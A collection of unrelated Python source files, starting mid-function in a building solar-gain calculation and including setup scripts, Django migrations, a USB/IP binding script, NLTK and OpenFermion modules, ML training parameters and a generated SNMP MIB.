df_roof = prop_architecture.merge(prop_roof, left_on='type_roof', right_on='code', how='left')
df_wall = prop_architecture.merge(prop_wall, left_on='type_wall', right_on='code', how='left')
df_win = prop_architecture.merge(prop_win, left_on='type_win', right_on='code', how='left')
df_shading = prop_architecture.merge(prop_shading, left_on='type_shade', right_on='code', how='left')
check_successful_merge(df_construction, df_leakage, df_roof, df_wall, df_win, df_shading, df_floor)
fields_construction = ['Name', 'Cm_Af', 'void_deck', 'Hs_ag', 'Hs_bg', 'Ns', 'Es']
fields_leakage = ['Name', 'n50']
fields_basement = ['Name', 'U_base']
fields_roof = ['Name', 'e_roof', 'a_roof', 'U_roof']
fields_wall = ['Name', 'wwr_north', 'wwr_west', 'wwr_east', 'wwr_south',
'e_wall', 'a_wall', 'U_wall']
fields_win = ['Name', 'e_win', 'G_win', 'U_win', 'F_F']
fields_shading = ['Name', 'rf_sh']
envelope_prop = df_roof[fields_roof].merge(df_wall[fields_wall], on='Name').merge(df_win[fields_win],
on='Name').merge(
df_shading[fields_shading], on='Name').merge(df_construction[fields_construction], on='Name').merge(
df_leakage[fields_leakage], on='Name').merge(
df_floor[fields_basement], on='Name')
return envelope_prop
def get_prop_solar(locator, building_names, prop_rc_model, prop_envelope):
"""
Gets the sensible solar gains from calc_Isol_daysim and stores in a dataframe containing building 'Name' and
I_sol (incident solar gains).
:param locator: an InputLocator for locating the input files
:param building_names: List of buildings
:param prop_rc_model: RC model properties of a building by name.
:param prop_envelope: dataframe containing the building envelope properties.
:return: dataframe containing the sensible solar gains for each building by name called result.
:rtype: Dataframe
"""
thermal_resistance_surface = RSE
# create result data frame
list_Isol = []
# for every building
for building_name in building_names:
I_sol = calc_Isol_daysim(building_name, locator, prop_envelope, prop_rc_model, thermal_resistance_surface)
list_Isol.append(I_sol)
result = pd.DataFrame({'Name': list(building_names), 'I_sol': list_Isol})
return result
def calc_Isol_daysim(building_name, locator, prop_envelope, prop_rc_model, thermal_resistance_surface):
"""
Reads Daysim geometry and radiation results and calculates the sensible solar heat loads based on the surface area
and building envelope properties.
:param building_name: Name of the building (e.g. B154862)
:param locator: an InputLocator for locating the input files
:param prop_envelope: contains the building envelope properties.
:param prop_rc_model: RC model properties of a building by name.
:param thermal_resistance_surface: Thermal resistance of building element.
:return: I_sol: numpy array containing the sensible solar heat loads for roof, walls and windows.
:rtype: np.array
"""
# read daysim radiation
radiation_data = pd.read_csv(locator.get_radiation_building(building_name))
# sum wall
# solar incident on all walls [W]
I_sol_wall = (radiation_data['walls_east_kW'] +
radiation_data['walls_west_kW'] +
radiation_data['walls_north_kW'] +
radiation_data['walls_south_kW']).values * 1000 # in W
# sensible gain on all walls [W]
I_sol_wall = I_sol_wall * \
prop_envelope.loc[building_name, 'a_wall'] * \
thermal_resistance_surface * \
prop_rc_model.loc[building_name, 'U_wall'] * \
prop_rc_model.loc[building_name, 'empty_envelope_ratio']
# sum roof
# solar incident on all roofs [W]
I_sol_roof = radiation_data['roofs_top_kW'].values * 1000 # in W
# sensible gain on all roofs [W]
I_sol_roof = I_sol_roof * \
prop_envelope.loc[building_name, 'a_roof'] * \
thermal_resistance_surface * \
prop_rc_model.loc[building_name, 'U_roof']
config = cea.config.Configuration()
I_sol_roof = I_sol_roof * (1 - config.bigmacc.heatgain)
# sum window, considering shading
I_sol_win = (radiation_data['windows_east_kW'] +
radiation_data['windows_west_kW'] +
radiation_data['windows_north_kW'] +
radiation_data['windows_south_kW']).values * 1000 # in W
Fsh_win = np.vectorize(blinds.calc_blinds_activation)(I_sol_win,
prop_envelope.loc[building_name, 'G_win'],
prop_envelope.loc[building_name, 'rf_sh'])
I_sol_win = I_sol_win * \
Fsh_win * \
(1 - prop_envelope.loc[building_name, 'F_F']) * \
prop_rc_model.loc[building_name, 'empty_envelope_ratio']
# sum
I_sol = I_sol_wall + I_sol_roof + I_sol_win
return I_sol
|
from setuptools import setup
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name='propius',
packages=['propius'],
version='0.1.2',
license='apache-2.0',
description='Extracts similar items over a big data using correlation between items over sparse data structures',
long_description=long_description,
author='Daniel Valencia',
author_email='dafevara@gmail.com',
url='https://github.com/dafevara/propius',
download_url='https://github.com/dafevara/propius/archive/refs/tags/0.1.1.tar.gz',
keywords=['python', 'machine-learning', 'big-data', 'bigdata', 'sparse', 'recommender-system', 'knn', 'sparse-matrices'],
install_requires=[
'setuptools',
'numpy',
'pandas',
'scikit-learn',
'fsspec',
's3fs',
'tdqm',
'mkdocs',
'mkdocs-gitbook',
'pygments',
'mkdocs-rtd-dropdown',
'mkdocs-material',
'mkdocstrings'
],
classifiers=[
'Environment :: Console',
'Environment :: MacOS X',
'Environment :: Other Environment',
'Environment :: Win32 (MS Windows)',
'Environment :: X11 Applications',
'Operating System :: MacOS',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft',
'Operating System :: Microsoft :: MS-DOS',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Operating System :: POSIX :: BSD',
'Operating System :: POSIX :: BSD :: FreeBSD',
'Operating System :: POSIX :: Linux',
'Operating System :: POSIX :: SunOS/Solaris',
'Operating System :: Unix',
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Build Tools',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Scientific/Engineering :: Mathematics',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
)
|
# Initialise the gpio package.
# Raspberry Pi (initial) model B (and A) GPIO modules
# Developed by R.E. McArdell / Dibase Limited.
# Copyright (c) 2012 Dibase Limited
# License: dual: GPL or BSD.
|
USER_PRESENCE_TEMPLATE = '{"last_update": ${last_update}, "network_to_users": ${network_to_users}}'
|
# usbpi.service.py
# requires python 3.9
import subprocess
import re
# replace device_id with your own device
device_id = '10c4:8a2a'
result = subprocess.run(['usbip', 'list', '-l'], capture_output=True)
m = re.findall(r'busid\s+([\d\.-]+)\s+\(([\w:]+)\)', result.stdout.decode('utf-8'))
for device in m:
if device[1] == device_id:
print(f'device found: {device[0]}')
subprocess.run(['usbip', 'bind', f'--busid={device[0]}'])
subprocess.run(['usbipd', '-d', '-4'])
break
|
#from django.shortcuts import render
from django.views import generic
from django.contrib.auth.mixins import LoginRequiredMixin
# Create your views here.
class Home(LoginRequiredMixin, generic.TemplateView):
template_name = 'bases/home.html'
login_url = 'bases-space:login'
#login_url = 'admin:index'
|
# Natural Language Toolkit: Reader for Grammar Files
#
# Copyright (C) 2001-2006 University of Pennsylvania
# Author: Rob Speer <rspeer@mit.edu>
# URL: <http://nltk.sf.net>
# For license information, see LICENSE.TXT
#
# $Id: grammarfile.py 3588 2006-10-20 06:13:57Z ehk $
"""
A module to read a grammar from a *.cfg file.
"""
from en.parser.nltk_lite.parse.category import *
from en.parser.nltk_lite.parse import cfg
from en.parser.nltk_lite.parse.featurechart import *
class GrammarFile(object):
def __init__(self):
self.grammatical_productions = []
self.lexical_productions = []
self.start = GrammarCategory(pos='Start').freeze()
def grammar(self):
return cfg.Grammar(self.start, self.grammatical_productions +\
self.lexical_productions)
def earley_grammar(self):
return cfg.Grammar(self.start, self.grammatical_productions)
def earley_lexicon(self):
lexicon = {}
for prod in self.lexical_productions:
lexicon.setdefault(prod.rhs()[0], []).append(prod.lhs())
return lexicon
def earley_parser(self, trace=1):
return FeatureEarleyChartParse(self.earley_grammar(),
self.earley_lexicon(), trace=trace)
def apply_lines(self, lines):
for line in lines:
line = line.strip()
if not len(line): continue
if line[0] == '#': continue
if line[0] == '%':
parts = line[1:].split()
directive = parts[0]
args = " ".join(parts[1:])
if directive == 'start':
self.start = GrammarCategory.parse(args).freeze()
elif directive == 'include':
filename = args.strip('"')
self.apply_file(filename)
else:
rules = GrammarCategory.parse_rules(line)
for rule in rules:
if len(rule.rhs()) == 1 and isinstance(rule.rhs()[0], str):
self.lexical_productions.append(rule)
else:
self.grammatical_productions.append(rule)
def apply_file(self, filename):
f = open(filename)
lines = f.readlines()
self.apply_lines(lines)
f.close()
def read_file(filename):
result = GrammarFile()
result.apply_file(filename)
return result
read_file = staticmethod(read_file)
def demo():
g = GrammarFile.read_file("test.cfg")
print g.grammar()
if __name__ == '__main__':
demo()
|
# Generated by Django 2.2.4 on 2019-08-11 14:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("user", "0006_add_company_information")]
operations = [
migrations.AlterField(
model_name="department",
name="type",
field=models.PositiveSmallIntegerField(
choices=[
(0, "ADMIN"),
(1, "DIRECTOR"),
(2, "DESIGN"),
(3, "FINANCE"),
(4, "SPONSORSHIP"),
(5, "HACKERXPERIENCE"),
(6, "LOGISTICS"),
(7, "MARKETING"),
(8, "PHOTOGRAPHY"),
(9, "STAFF"),
(10, "WEBDEV"),
]
),
)
]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-05 10:19
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Column',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField(blank=True, null=True)),
('name', models.CharField(max_length=256)),
('description', models.TextField(blank=True, null=True)),
('unit', models.CharField(blank=True, max_length=256, null=True)),
('ucd', models.CharField(blank=True, max_length=256, null=True)),
('utype', models.CharField(blank=True, max_length=256, null=True)),
('datatype', models.CharField(blank=True, max_length=256, null=True)),
('size', models.IntegerField(blank=True, help_text='The length of variable length datatypes, e.g. varchar(256).', null=True)),
('principal', models.BooleanField(default=False, help_text='This column is considered a core part of the content.')),
('indexed', models.BooleanField(default=False, help_text='This column is indexed.')),
('std', models.BooleanField(default=False, help_text='This column is defined by some standard.')),
],
options={
'ordering': ('table__database__order', 'table__order', 'order'),
'permissions': (('view_column', 'Can view Column'),),
'verbose_name_plural': 'Columns',
'verbose_name': 'Column',
},
),
migrations.CreateModel(
name='Database',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField(blank=True, null=True)),
('name', models.CharField(max_length=256)),
('description', models.TextField(blank=True, null=True)),
('utype', models.CharField(blank=True, max_length=256, null=True)),
],
options={
'ordering': ('order',),
'permissions': (('view_database', 'Can view Database'),),
'verbose_name_plural': 'Databases',
'verbose_name': 'Database',
},
),
migrations.CreateModel(
name='Function',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField(blank=True, null=True)),
('name', models.CharField(max_length=256)),
('description', models.TextField(blank=True, null=True)),
],
options={
'ordering': ('order',),
'permissions': (('view_function', 'Can view Function'),),
'verbose_name_plural': 'Functions',
'verbose_name': 'Function',
},
),
migrations.CreateModel(
name='Table',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField(blank=True, null=True)),
('name', models.CharField(max_length=256)),
('description', models.TextField(blank=True, null=True)),
('type', models.CharField(choices=[('table', 'Table'), ('view', 'View')], max_length=8)),
('utype', models.CharField(blank=True, max_length=256, null=True)),
('database', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='tables', to='daiquiri_metadata.Database')),
],
options={
'ordering': ('database__order', 'order'),
'permissions': (('view_table', 'Can view Table'),),
'verbose_name_plural': 'Tables',
'verbose_name': 'Table',
},
),
migrations.AddField(
model_name='column',
name='table',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='columns', to='daiquiri_metadata.Table'),
),
]
|
def CHECK_ER(ret):
if ret['errors']:
raise ValueError(f'Failed to modify data: {ret["first_error"]}')
if ret['skipped']:
raise ValueError(f'Failed to modify data: skipped - {ret["skipped"]}')
|
from __future__ import absolute_import
from octavious.parallelizer import Parallelizer
class DummyParallelizer(Parallelizer):
"""This class is a dummy implementation so it runs processors one by one in
a sequence.
"""
def parallelize(self, processors, input=None, callback=None):
"""Convenient ``Parallelizer.parallelize`` implementation
"""
results_list = []
subtasks = []
for processor in processors:
results = processor(input)
if callback:
callback(results)
results_list.append(results)
return results_list
parallelizer = DummyParallelizer
|
# noinspection PyPackageRequirements
from tap import Tap
from typing import List
import os
LMDB_DATA_ROOT = os.environ.get('LMDB_DATA_ROOT', './data')
# noinspection LongLine
class ParamsBase(Tap):
"""
All default parameters should be set here
"""
"""------General------"""
experiment_name: str = None # Name of experiment, used to create subdirectory for logs and checkpoints
config_file: str = None # path to configuration file
dry_run: bool = False # Do not save any outputs - For debug purpose only.
override_experiment: bool = False # Use with caution! Deletes all logs and checkpoint of <experiment_name> if exists.
override_experiment_with_backup: bool = False # Moves logs and checkpoint of <experiment_name> to <experiment_name>_bkp if exists.
"""-------Alpha Config"""
alpha_map: List[float] = [1., 0.5, 2, 0.5] # A list of pairs of numbers, the firs number indicates the alpha type (1-perln,2-gaussian) The second is the percentage of the batch [0-1]
"""------Network Config------"""
backbone: str = 'vgg' # either 'vgg' or 'pnasnet5large'
decoder_depths: List[int] = (512,) # List of depths for decoder layers.
load_from_checkpoint: bool = True # A flag to to load from checkpoint or not
load_checkpoint_path: str = None # Path to checkpoint, if not given looks for latest checkpoint in directory if exists.
"""------Data reader------"""
input_size: int = 512 # size of input image, the image will be resiezed to a square while perserving aspect ratio
lmdb_data_path: List[str] = (os.path.join(LMDB_DATA_ROOT, 'coco'),) # Path to trainind data
output_dir: str = os.path.join('.', 'Outputs') # Path to save output files
batch_size: int = 3 # Training batch size
num_workers: int = 2 # Number of workers for data loader
non_arp_resize: bool = False # perform non aspect perserving resize
caption_aug: List[str] = 'drop:0.5' # caption augmentaion can be drop:0.5 for 50% drop rate
"""------Optimizer and Loss------"""
neg_weight: float = 1 # weight for negative loss
adv_weight: float = 1 # weight for adversarial loss
img2txt_weight: float = 0.1 # weight for image2text loss
optimizer: str = 'adam' # Training optimizer, currently implemented 'sgd' or 'adam'
learning_rate: float = 0.0001 # Training learning rate
backbone_lr: float = 0.0001 # Training learning rate for backbone
momentum: float = 0.9 # Training momentum for SGD optimizer
beta: List[float] = [0.9, 0.999] # Training momentum for Adam optimizer
weight_decay: float = 0.000000001 # Training weight decay regularization
learning_rate_decay_step: int = 50000 # Step number for lr scheduler decay
"""------Training and Logging------"""
num_epochs: int = 10 # Number of epochs in training session
log_train_interval: int = 1000 # Number of iterations between each print of train loss and accuracy
validation_interval: int = 5000 # Number of iterations between each validation step
max_val_time: float = 10 # maximum time (in minutes) to spend on validation. breaks validation loop at this time
max_steps: int = None # Maximum number of steps, used mainly for debugging and unit tests
"""------Distributed Training------"""
sync_bn: bool = False # use sync batch norm for DDP
local_rank: int = 0 # set by torch multiprocessing
"""------Debugging--------"""
debug_mode: bool = False # Used for debug purposes
save_code_snapshot = False # Save a zip of the code when running, used for debug/reproducability
"""
END DEFAULT PARAMETERS
"""
# noinspection PyAttributeOutsideInit
def add_arguments(self) -> None:
self.add_argument('-e', '--experiment_name')
pass
class Params(ParamsBase):
def add_arguments(self) -> None:
config_file = ParamsBase(description=self.description).parse_args(known_only=True).config_file
if config_file is not None:
self.load(config_file)
super().add_arguments()
# noinspection PyAttributeOutsideInit
def process_args(self):
if not self._parsed:
return
# process parameters for saveing
self.root_save_dir = os.path.join(self.output_dir, self.experiment_name)
self.save_checkpoint_dir = os.path.join(self.root_save_dir, 'checkpoints')
self.save_log_dir = os.path.join(self.root_save_dir, 'logs')
self.save_debug_dir = os.path.join(self.root_save_dir, 'debug')
self.save_checkpoint_path = os.path.join(self.save_checkpoint_dir, 'checkpoint.dict')
if self.load_from_checkpoint is True and self.load_checkpoint_path is None:
self.load_checkpoint_path = os.path.join(self.save_checkpoint_dir, 'checkpoint.dict')
def _log_all(self): # override tap git usage
return self.as_dict()
def get_params():
args = Params(description='Train Grounding by Separation').parse_args()
args.process_args()
return args
|
# Copyright 2017 Insurance Australia Group Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Creates the ElasticSearch CloudFormation template.
"""
import os
import sys
import common
import get_checksum_zip
import get_external_cidr
import get_verification_rules
RULES_TEMPLATE_BASE = os.environ['LOCATION_CORE']+"/"+"watchmen_cloudformation/templates/elastic-search.tmpl"
TEMPLATE_DESTINATION = os.environ['LOCATION_CORE']+"/"+"watchmen_cloudformation/files/elastic-search.yml"
def get_subscriptions_cf(rules):
"""Creates a CloudFormation template snippet for subscriptions based on the rules provided.
Args:
rules: List of rules used to create subscriptions for.
Returns:
Text containing a snippet of the CloudFormation template for subscriptions.
"""
snippet = ""
for rule in rules:
template = \
""" {rule_name}Subscription:
Type: AWS::Logs::SubscriptionFilter
DependsOn: CloudwatchLogsLambdaPermissions
Condition: ShouldCreateSubscription
Properties:
LogGroupName: !Sub "/aws/lambda/${Prefix}{rule_name}"
FilterPattern: ""
DestinationArn: !GetAtt LogsToElasticsearch.Arn
"""
snippet += template.replace(
"{rule_name}",
common.to_pascal_case(rule.get('name'))
)
return snippet
def main(args):
"""Opens a "template" file, substitutes values into it and then writes
the contents to a new file.
"""
# If no parameters were passed in
if len(args) == 1:
rules = get_verification_rules.get_rules()
else:
# Parameter contains paths, e.g. ./verification_rules,./folder1/verification_rules
rules = get_verification_rules.get_rules(args[1].split(","))
elasticsearch_cf = common.get_template(RULES_TEMPLATE_BASE).replace(
"{{logs_to_elastic_search}}",
get_checksum_zip.get_checksum_zip("logs_to_elastic_search")
).replace(
"{{roll_indexes}}",
get_checksum_zip.get_checksum_zip("roll_indexes")
).replace(
"{{external_cidr}}",
get_external_cidr.get_external_cidr()
).replace(
"{{rules-subscriptions}}",
get_subscriptions_cf(rules)
)
common.generate_file(TEMPLATE_DESTINATION, elasticsearch_cf)
if __name__ == "__main__":
main(sys.argv)
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module to compute Trotter errors in the plane-wave dual basis."""
from __future__ import absolute_import
from future.utils import iteritems, itervalues
import numpy
import openfermion.hamiltonians
from openfermion.ops import FermionOperator
from openfermion.utils import count_qubits, normal_ordered
from openfermion.utils._commutators import (
double_commutator,
trivially_double_commutes_dual_basis,
trivially_double_commutes_dual_basis_using_term_info)
def low_depth_second_order_trotter_error_operator(
terms, indices=None, is_hopping_operator=None, jellium_only=False,
verbose=False):
"""Determine the difference between the exact generator of unitary
evolution and the approximate generator given by the second-order
Trotter-Suzuki expansion.
Args:
terms: a list of FermionOperators in the Hamiltonian in the
order in which they will be simulated.
indices: a set of indices the terms act on in the same order as terms.
is_hopping_operator: a list of whether each term is a hopping operator.
jellium_only: Whether the terms are from the jellium Hamiltonian only,
rather than the full dual basis Hamiltonian (i.e. whether
c_i = c for all number operators i^ i, or whether they
depend on i as is possible in the general case).
verbose: Whether to print percentage progress.
Returns:
The difference between the true and effective generators of time
evolution for a single Trotter step.
Notes: follows Equation 9 of Poulin et al.'s work in "The Trotter Step
Size Required for Accurate Quantum Simulation of Quantum Chemistry",
applied to the "stagger"-based Trotter step for detailed in
Kivlichan et al., "Quantum Simulation of Electronic Structure with
Linear Depth and Connectivity", arxiv:1711.04789.
"""
more_info = bool(indices)
n_terms = len(terms)
if verbose:
import time
start = time.time()
error_operator = FermionOperator.zero()
for beta in range(n_terms):
if verbose and beta % (n_terms // 30) == 0:
print('%4.3f percent done in' % (
(float(beta) / n_terms) ** 3 * 100), time.time() - start)
for alpha in range(beta + 1):
for alpha_prime in range(beta):
# If we have pre-computed info on indices, use it to determine
# trivial double commutation.
if more_info:
if (not
trivially_double_commutes_dual_basis_using_term_info(
indices[alpha], indices[beta],
indices[alpha_prime], is_hopping_operator[alpha],
is_hopping_operator[beta],
is_hopping_operator[alpha_prime], jellium_only)):
# Determine the result of the double commutator.
double_com = double_commutator(
terms[alpha], terms[beta], terms[alpha_prime],
indices[beta], indices[alpha_prime],
is_hopping_operator[beta],
is_hopping_operator[alpha_prime])
if alpha == beta:
double_com /= 2.0
error_operator += double_com
# If we don't have more info, check for trivial double
# commutation using the terms directly.
elif not trivially_double_commutes_dual_basis(
terms[alpha], terms[beta], terms[alpha_prime]):
double_com = double_commutator(
terms[alpha], terms[beta], terms[alpha_prime])
if alpha == beta:
double_com /= 2.0
error_operator += double_com
error_operator /= 12.0
return error_operator
def low_depth_second_order_trotter_error_bound(
terms, indices=None, is_hopping_operator=None,
jellium_only=False, verbose=False):
"""Numerically upper bound the error in the ground state energy
for the second-order Trotter-Suzuki expansion.
Args:
terms: a list of single-term FermionOperators in the Hamiltonian
to be simulated.
indices: a set of indices the terms act on in the same order as terms.
is_hopping_operator: a list of whether each term is a hopping operator.
jellium_only: Whether the terms are from the jellium Hamiltonian only,
rather than the full dual basis Hamiltonian (i.e. whether
c_i = c for all number operators i^ i, or whether they
depend on i as is possible in the general case).
verbose: Whether to print percentage progress.
Returns:
A float upper bound on norm of error in the ground state energy.
Notes:
Follows Equation 9 of Poulin et al.'s work in "The Trotter Step
Size Required for Accurate Quantum Simulation of Quantum
Chemistry" to calculate the error operator, for the "stagger"-based
Trotter step for detailed in Kivlichan et al., "Quantum Simulation
of Electronic Structure with Linear Depth and Connectivity",
arxiv:1711.04789.
"""
# Return the 1-norm of the error operator (upper bound on error).
return numpy.sum(numpy.absolute(list(
low_depth_second_order_trotter_error_operator(
terms, indices, is_hopping_operator,
jellium_only, verbose).terms.values())))
def simulation_ordered_grouped_low_depth_terms_with_info(
hamiltonian, input_ordering=None):
"""Give terms from the dual basis Hamiltonian in simulated order.
Uses the simulation ordering, grouping terms into hopping
(i^ j + j^ i) and number (i^j^ i j + c_i i^ i + c_j j^ j) operators.
Pre-computes term information (indices each operator acts on, as
well as whether each operator is a hopping operator.
Args:
hamiltonian (FermionOperator): The Hamiltonian.
input_ordering (list): The initial Jordan-Wigner canonical order.
Returns:
A 3-tuple of terms from the Hamiltonian in order of simulation,
the indices they act on, and whether they are hopping operators
(both also in the same order).
Notes:
Follows the "stagger"-based simulation order discussed in Kivlichan
et al., "Quantum Simulation of Electronic Structure with Linear
Depth and Connectivity", arxiv:1711.04789; as such, the only
permitted types of terms are hopping (i^ j + j^ i) and potential
terms which are products of at most two number operators.
"""
n_qubits = count_qubits(hamiltonian)
hamiltonian = normal_ordered(hamiltonian)
ordered_terms = []
ordered_indices = []
ordered_is_hopping_operator = []
# If no input mode ordering is specified, default to range(n_qubits).
try:
input_ordering = list(input_ordering)
except TypeError:
input_ordering = list(range(n_qubits))
# Half a second-order Trotter step reverses the input ordering: this tells
# us how much we need to include in the ordered list of terms.
final_ordering = list(reversed(input_ordering))
# Follow odd-even transposition sort. In alternating steps, swap each even
# qubits with the odd qubit to its right, and in the next step swap each
# the odd qubits with the even qubit to its right. Do this until the input
# ordering has been reversed.
parity = 0
while input_ordering != final_ordering:
results = stagger_with_info(
hamiltonian, input_ordering, parity)
terms_in_step, indices_in_step, is_hopping_operator_in_step = results
ordered_terms.extend(terms_in_step)
ordered_indices.extend(indices_in_step)
ordered_is_hopping_operator.extend(is_hopping_operator_in_step)
# Alternate even and odd steps of the reversal procedure.
parity = 1 - parity
return (ordered_terms, ordered_indices, ordered_is_hopping_operator)
def stagger_with_info(hamiltonian, input_ordering, parity):
"""Give terms simulated in a single stagger of a Trotter step.
Groups terms into hopping (i^ j + j^ i) and number
(i^j^ i j + c_i i^ i + c_j j^ j) operators.
Pre-computes term information (indices each operator acts on, as
well as whether each operator is a hopping operator).
Args:
hamiltonian (FermionOperator): The Hamiltonian.
input_ordering (list): The initial Jordan-Wigner canonical order.
parity (boolean): Whether to determine the terms from the next even
(False = 0) or odd (True = 1) stagger.
Returns:
A 3-tuple of terms from the Hamiltonian that are simulated in the
stagger, the indices they act on, and whether they are hopping
operators (all in the same order).
Notes:
The "staggers" used here are the left (parity=False) and right
(parity=True) staggers detailed in Kivlichan et al., "Quantum
Simulation of Electronic Structure with Linear Depth and
Connectivity", arxiv:1711.04789. As such, the Hamiltonian must be
in the form discussed in that paper. This constrains it to have
only hopping terms (i^ j + j^ i) and potential terms which are
products of at most two number operators (n_i or n_i n_j).
"""
terms_in_step = []
indices_in_step = []
is_hopping_operator_in_step = []
zero = FermionOperator.zero()
n_qubits = count_qubits(hamiltonian)
# A single round of odd-even transposition sort.
for i in range(parity, n_qubits - 1, 2):
# Always keep the max on the left to avoid having to normal order.
left = max(input_ordering[i], input_ordering[i + 1])
right = min(input_ordering[i], input_ordering[i + 1])
# Calculate the hopping operators in the Hamiltonian.
left_hopping_operator = FermionOperator(
((left, 1), (right, 0)), hamiltonian.terms.get(
((left, 1), (right, 0)), 0.0))
right_hopping_operator = FermionOperator(
((right, 1), (left, 0)), hamiltonian.terms.get(
((right, 1), (left, 0)), 0.0))
# Calculate the two-number operator l^ r^ l r in the Hamiltonian.
two_number_operator = FermionOperator(
((left, 1), (right, 1), (left, 0), (right, 0)),
hamiltonian.terms.get(
((left, 1), (right, 1), (left, 0), (right, 0)), 0.0))
# Calculate the left number operator, left^ left.
left_number_operator = FermionOperator(
((left, 1), (left, 0)), hamiltonian.terms.get(
((left, 1), (left, 0)), 0.0))
# Calculate the right number operator, right^ right.
right_number_operator = FermionOperator(
((right, 1), (right, 0)), hamiltonian.terms.get(
((right, 1), (right, 0)), 0.0))
# Divide single-number terms by n_qubits-1 to avoid over-counting.
# Each qubit is swapped n_qubits-1 times total.
left_number_operator /= (n_qubits - 1)
right_number_operator /= (n_qubits - 1)
# If the overall hopping operator isn't close to zero, append it.
# Include the indices it acts on and that it's a hopping operator.
if not (left_hopping_operator +
right_hopping_operator) == zero:
terms_in_step.append(left_hopping_operator +
right_hopping_operator)
indices_in_step.append(set((left, right)))
is_hopping_operator_in_step.append(True)
# If the overall number operator isn't close to zero, append it.
# Include the indices it acts on and that it's a number operator.
if not (two_number_operator + left_number_operator +
right_number_operator) == zero:
terms_in_step.append(two_number_operator +
left_number_operator +
right_number_operator)
indices_in_step.append(set((left, right)))
is_hopping_operator_in_step.append(False)
# Modify the current Jordan-Wigner canonical ordering in-place.
input_ordering[i], input_ordering[i + 1] = (input_ordering[i + 1],
input_ordering[i])
return terms_in_step, indices_in_step, is_hopping_operator_in_step
def ordered_low_depth_terms_no_info(hamiltonian):
"""Give terms from Hamiltonian in dictionary output order.
Args:
hamiltonian (FermionOperator): The Hamiltonian.
Returns:
A list of terms from the Hamiltonian in simulated order.
Notes:
Assumes the Hamiltonian is in the form discussed in Kivlichan
et al., "Quantum Simulation of Electronic Structure with Linear
Depth and Connectivity", arxiv:1711.04789. This constrains the
Hamiltonian to have only hopping terms (i^ j + j^ i) and potential
terms which are products of at most two number operators (n_i or
n_i n_j).
"""
n_qubits = count_qubits(hamiltonian)
hamiltonian = normal_ordered(hamiltonian)
terms = []
for operators, coefficient in iteritems(hamiltonian.terms):
terms += [FermionOperator(operators, coefficient)]
return terms
|
#
# PySNMP MIB module NGWASYNC (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/NGWASYNC
# Produced by pysmi-0.3.4 at Mon Apr 29 20:11:26 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
NotificationType, ModuleIdentity, iso, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, TimeTicks, Counter32, Unsigned32, IpAddress, NotificationType, Counter64, ObjectIdentity, enterprises, Bits, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "ModuleIdentity", "iso", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "TimeTicks", "Counter32", "Unsigned32", "IpAddress", "NotificationType", "Counter64", "ObjectIdentity", "enterprises", "Bits", "Gauge32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
wpcorp = MibIdentifier((1, 3, 6, 1, 4, 1, 922))
gateways = MibIdentifier((1, 3, 6, 1, 4, 1, 922, 2))
ngwasync = MibIdentifier((1, 3, 6, 1, 4, 1, 922, 2, 1))
ngwasyncInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 922, 2, 1, 1))
